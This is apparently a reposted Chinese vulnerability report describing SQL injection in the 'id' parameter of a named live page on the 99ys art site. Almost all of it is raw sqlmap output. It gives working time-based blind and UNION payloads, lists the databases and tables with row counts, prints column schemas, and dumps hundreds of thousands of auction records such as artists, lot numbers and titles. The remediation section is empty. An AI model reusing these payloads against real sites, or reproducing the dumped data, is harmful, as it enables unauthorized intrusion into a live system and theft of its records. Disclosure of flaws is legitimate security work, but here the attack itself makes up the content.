99艺术网某分站某处SQL注入导致大量用户及拍卖交易信息泄露
程序员文章站
2022-07-09 22:07:11
rt
https://magazine.99ys.com/hdbox.php?id=5285&page=1
sqlm...
rt
https://magazine.99ys.com/hdbox.php?id=5285&page=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=5285 AND (SELECT * FROM (SELECT(SLEEP(5)))ALAJ)&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6546 UNION ALL SELECT NULL,CONCAT(0x717a787071,0x4b457a4c646c78426d4d,0x7170626a71)
,NULL-- &page=1
---
[23:13:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
[23:13:50] [INFO] fetching database names
[23:13:50] [INFO] the SQL query used returns 4 entries
[23:13:50] [INFO] resumed: information_schema
[23:13:50] [INFO] resumed: 99yss
[23:13:50] [INFO] resumed: cacti
[23:13:50] [INFO] resumed: test
available databases [4]:
[*] 99yss
[*] cacti
[*] information_schema
[*] test
Database: 99yss +-----------------------------+---------+ | Table | Entries | +-----------------------------+---------+ | `99art_news_tags` | 664044 | | `99art_auction_work` | 560280 | | `99_auction_work` | 537135 | | `99art_auction_work22` | 537049 | | vert_auction_work | 516396 | | `99_news_tags` | 433854 | | `99art_news_attribute` | 335335 | | `99art_news_images` | 307909 | | `99_news_attribute` | 177772 | | `99_news_images` | 175267 | | `99art_news_hit` | 160863 | | `99art_news_category` | 157557 | | `99art_news` | 157555 | | `99art_news_tags_fulltext` | 157469 | | vert_images | 142531 | | `99art_exhibit_works` | 132675 | | vert_mall_comment | 128561 | | `99_news_title` | 93424 | | `99_news_hit` | 93361 | | `99_news` | 92598 | | `99_news_content` | 91453 | | vert_exhibit_works | 81357 | | `99user_work` | 75608 | | `99_works` | 69408 | | `99art_exhibit_works1` | 65127 | | `99_exhibit_works` | 65104 | | vert_cha_works | 55567 | | `99_artist_works` | 40222 | | `99user_category` | 25058 | | `99special_zan_ip` | 22692 | | vert_gal_exhibit | 18396 | | `99art_news_mechanism` | 17072 | | `99art_exhibit` | 14523 | | vert_index_history | 13838 | | `99user_news` | 11648 | | `99art_news_people` | 11011 | | `99art_auction_special` | 10221 | | vert_index_history_old | 9683 | | `99art_index_history` | 9670 | | `99user_message` | 8967 | | vert_comment | 8613 | | vert_en_comment | 8338 | | vert_exhibit | 8071 | | `99app_push` | 7396 | | `99art_exhibit1` | 6454 | | `99_exhibit` | 6436 | | vert_cha_article | 6205 | | `99user_photo` | 5736 | | vert_publish_content | 5360 | | `99_recommend_history` | 5205 | | `99art_live_images` | 5166 | | `99user_tags` | 4778 | | `99art_ad_hit_new` | 4508 | | `99user_work_album` | 4315 | | `99art_comment` | 4238 | | live_images | 4178 | | vert_gal_works | 3982 | | `99user_photo_album` | 3772 | | `99art_index_shhistory` | 3732 | | `99user_hit` | 3572 | | `99user_modul` | 3568 | | `99user_artist_intro` | 3539 | | `99user_users` | 3421 | | `99art_index_cdhistory` | 3330 | | `99_auction_special` | 3286 | | `99art_auction_address` | 2761 | | `99art_auction` | 2657 | | `99art_area` | 2469 | | vert_area | 2465 | | vert_auction_special | 2460 | | vert_cha_artist | 2425 | | vert_gal_gallery | 2215 | | vert_tags | 2147 | | `99app_special_sub` | 2026 | | `99art_comment_floor` | 1999 | | `99_feature_index` | 1923 | | `99_artist` | 1906 | | `99user_yearbook` | 1836 | | vert_en_news | 1823 | | `99art_exhibit_do` | 1803 | | `99art_auction_work1` | 1555 | | `99_mechanism` | 1532 | | `99_mechanism_bak` | 1479 | | `99art_news_exhibit` | 1469 | | vert_exhibit_news | 1456 | | `99_feature_import` | 1433 | | `99art_index` | 1369 | | `99art_auction_hit` | 1342 | | `99_exhibit_news22` | 1317 | | `99art_live_comment` | 1265 | | `99app_headlines` | 1261 | | `99_exhibit_news` | 1242 | | live_comment | 1239 | | `99art_index_newhistory` | 1216 | | vert_publish_list | 1118 | | vert_del | 1085 | | `99app_collecting` | 1028 | | `99_auction_work1` | 1019 | | vert_index | 946 | | vert_en_works | 921 | | `99app_imglook` | 882 | | `99_comment` | 867 | | vert_artist | 852 | | notepreg | 835 | | `99_news_recycling` | 819 | | fail_record | 694 | | gather_info | 659 | | vert_gallery | 657 | | vert_en_exhibition | 608 | | vert_auction | 587 | | vert_cha_works_artist | 500 | | vert_auction_icfbse | 491 | | operate | 425 | | vert_mall_goods | 394 | | vert_auction_agencies | 361 | | vert_deet | 344 | | `99user_comment` | 309 | | `99special_comment` | 293 | | `99special_article` | 245 | | `99art_index_modul` | 204 | | `99special_zan` | 199 | | `99art_index_modul20131103` | 190 | | `99art_ad_new` | 174 | | vert_publish_name | 170 | | vert_index_modul | 164 | | `99user_artist_link` | 163 | | source | 161 | | `99_index_modul` | 156 | | `99app_feedback` | 134 | | `99art_ad_column_new` | 128 | | `99_recommend` | 117 | | `99art_column` | 115 | | `99art_live` | 112 | | source_mol | 108 | | `99app_focusimg` | 106 | | `99art_live_exhibit` | 106 | | vert_ad | 102 | | vert_link | 100 | | vert_en_index | 92 | | live | 91 | | live_exhibit | 87 | | vert_special_comment | 87 | | vert_category | 79 | | vert_gal_publish | 78 | | vert_event | 77 | | vert_email | 72 | | vert_cha_series | 69 | | `99art_exhibit_charge` | 55 | | `99_column` | 50 | | `99app_special` | 46 | | `99special_author` | 46 | | vert_en_artist | 45 | | vert_special_viewpoint | 44 | | vert_focus_picture | 38 | | `99art_ad` | 35 | | `99_feature_module` | 34 | | user_session_id | 30 | | vert_live_comment | 27 | | vert_admin | 26 | | vert_en_link | 26 | | `99_index` | 23 | | `99_attribute` | 21 | | `99_exhibit_target` | 19 | | `99art_exhibit_target` | 19 | | vert_exhibit_target | 19 | | `99_relative` | 18 | | vert_synopsis | 18 | | `99app_search_key` | 17 | | `99_community` | 16 | | `99art_ad_news` | 16 | | vert_cha_community | 16 | | vert_en_category | 16 | | `99_artist_category` | 15 | | `99user_media` | 15 | | vert_cha_category | 15 | | `99_feature` | 14 | | `99_recommend_position` | 14 | | vert_en_ad | 14 | | vert_live_images | 14 | | `99user_cover` | 12 | | vert_en_link_category | 11 | | vert_link_category | 11 | | security | 9 | | `99art_ad_column` | 8 | | vert_live_related | 8 | | vert_special_subject | 8 | | `99_ad_column` | 7 | | `99_auction_attribute` | 6 | | `99_exhibit_category` | 6 | | `99_mechanism_category` | 6 | | `99art_auction_attribute` | 6 | | `99art_exhibit_category` | 6 | | vert_auction_category | 6 | | vert_en_modul | 6 | | vert_exhibit_category | 6 | | `99_artist_class` | 5 | | `99user_class` | 5 | | `99user_sys_category` | 5 | | vert_cha_class | 5 | | vert_gal_category | 5 | | `99art_position_web` | 4 | | `99ceshi` | 3 | | `99_works_category` | 2 | | `99special_image` | 2 | | vert_mall_news | 2 | | vert_organ | 2 | | `99app_about` | 1 | | `99app_ad` | 1 | | vert_search_key | 1 | +-----------------------------+---------+
Database: 99yss Table: 99art_auction_work [38 columns] +---------------+--------------+ | Column | Type | +---------------+--------------+ | order | smallint(6) | | size | varchar(50) | | year | varchar(50) | | admin | varchar(50) | | aid | int(11) | | auc_name | varchar(50) | | auc_time | int(11) | | author | varchar(50) | | author_id | int(11) | | author_intro | text | | author_year | varchar(100) | | cat_num | varchar(20) | | company | varchar(50) | | content | text | | deal_val_eur | varchar(50) | | deal_val_hkd | varchar(50) | | deal_val_rmb | varchar(50) | | deal_val_usd | varchar(50) | | est_max | varchar(50) | | est_min | varchar(50) | | est_type | smallint(6) | | id | int(11) | | materials | varchar(50) | | mid | int(11) | | money_prefix | char(4) | | mtype | smallint(6) | | other | text | | pub_time | int(11) | | sid | int(11) | | specail_name | varchar(100) | | src | varchar(30) | | statement | varchar(255) | | type | varchar(50) | | valuation_eur | varchar(50) | | valuation_hkd | varchar(50) | | valuation_usd | varchar(50) | | valuations | varchar(50) | | work_name | varchar(150) | +---------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=5285 AND (SELECT * FROM (SELECT(SLEEP(5)))ALAJ)&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6546 UNION ALL SELECT NULL,CONCAT(0x717a787071,0x4b457a4c646c78426d4d,0x7170626a71)
,NULL-- &page=1
---
[23:15:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
Database: 99yss
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| `99art_auction_work` | 560280 |
+----------------------+---------+
[23:15:38] [INFO] fetching columns 'admin, auc_name, author, author_id, cat_num, work_name' for tabl
e '99art_auction_work' in database '99yss'
[23:15:38] [INFO] the SQL query used returns 6 entries
[23:15:38] [INFO] resumed: "auc_name","varchar(50)"
[23:15:38] [INFO] resumed: "cat_num","varchar(20)"
[23:15:38] [INFO] resumed: "work_name","varchar(150)"
[23:15:38] [INFO] resumed: "author","varchar(50)"
[23:15:38] [INFO] resumed: "admin","varchar(50)"
[23:15:38] [INFO] resumed: "author_id","int(11)"
[23:15:38] [INFO] fetching entries of column(s) 'admin, auc_name, author, author_id, cat_num, work_n
ame' for table '99art_auction_work' in database '99yss'
[23:15:38] [INFO] the SQL query used returns 560280 entries
[23:15:39] [WARNING] reflective value(s) found and filtering out
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0054","瓶花图"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0055","草虫花卉"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","齐白石","0","0056","葡萄"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","白雪石","0","0057","漓江春晓"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","白雪石","0","0058","春风漓水"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","方济众","0","0059","岩畔"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0060","凌霄八哥"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","李苦禅","0","0061","松鹰图"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","许麐庐 黄胄","0","0062","古乐...
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","孙其峰","0","0063","林间春晚"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","孙其峰","0","0064","水滨"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","郭味蕖","0","0065","茶花"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","郭味蕖","0","0066","墨梅图"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","亚明 于希宁","0","0067","明珠璀灿
"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张辛国","0","0068","大吉图"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吕林","0","0069","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张正宇","0","0070","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张正宇","0","0071","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","黄永玉","0","0072","大解脱"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王子武","0","0073","曹雪芹小像"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","叶浅予","0","0074","藏族舞者"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","刘汉","0","0075","奔月图"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","林锴","0","0076","酩酊夜归图"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","齐燕铭","0","0077","篆书"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","何海霞","0","0078","行书五言诗"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吴作人","0","0079","行书"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吴作人","0","0080","行书"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","李苦禅","0","0081","章草七言诗"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","董寿平","0","0082","草书*词"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","启功","0","0083","草书五言诗"
Database: 99yss Table: 99art_auction_work22 [38 columns] +---------------+--------------+ | Column | Type | +---------------+--------------+ | order | smallint(6) | | size | varchar(50) | | year | varchar(50) | | admin | varchar(50) | | aid | int(11) | | auc_name | varchar(50) | | auc_time | int(11) | | author | varchar(50) | | author_id | int(11) | | author_intro | text | | author_year | varchar(100) | | cat_num | varchar(20) | | company | varchar(50) | | content | text | | deal_val_eur | varchar(50) | | deal_val_hkd | varchar(50) | | deal_val_rmb | varchar(50) | | deal_val_usd | varchar(50) | | est_max | varchar(50) | | est_min | varchar(50) | | est_type | smallint(6) | | id | int(11) | | materials | varchar(50) | | mid | int(11) | | money_prefix | char(4) | | mtype | smallint(6) | | other | text | | pub_time | int(11) | | sid | int(11) | | specail_name | varchar(100) | | src | varchar(30) | | statement | varchar(255) | | type | varchar(50) | | valuation_eur | varchar(50) | | valuation_hkd | varchar(50) | | valuation_usd | varchar(50) | | valuations | varchar(50) | | work_name | varchar(150) | +---------------+--------------+
Database: 99yss Table: 99_auction_work [34 columns] +--------------+--------------+ | Column | Type | +--------------+--------------+ | order | smallint(6) | | size | varchar(50) | | year | varchar(50) | | admin | varchar(50) | | aid | int(11) | | auc_company | varchar(50) | | auc_name | varchar(50) | | auc_time | int(11) | | author | varchar(50) | | author_intro | text | | author_year | varchar(100) | | cat_num | varchar(20) | | content | text | | deal_val_eur | varchar(50) | | deal_val_hkd | varchar(50) | | deal_val_rmb | varchar(50) | | deal_val_usd | varchar(50) | | est_max | varchar(50) | | est_min | varchar(50) | | est_type | smallint(6) | | gal_id | int(11) | | id | int(11) | | materials | varchar(50) | | money_prefix | char(4) | | mtype | smallint(6) | | other | text | | pub_time | int(11) | | sid | int(11) | | specail_name | varchar(100) | | src | varchar(30) | | statement | varchar(255) | | type | varchar(50) | | valuations | varchar(50) | | work_name | varchar(150) | +--------------+--------------+
解决方案:
上一篇: VMProtect代码还原技术
下一篇: TCP细节探究:TCP数据交互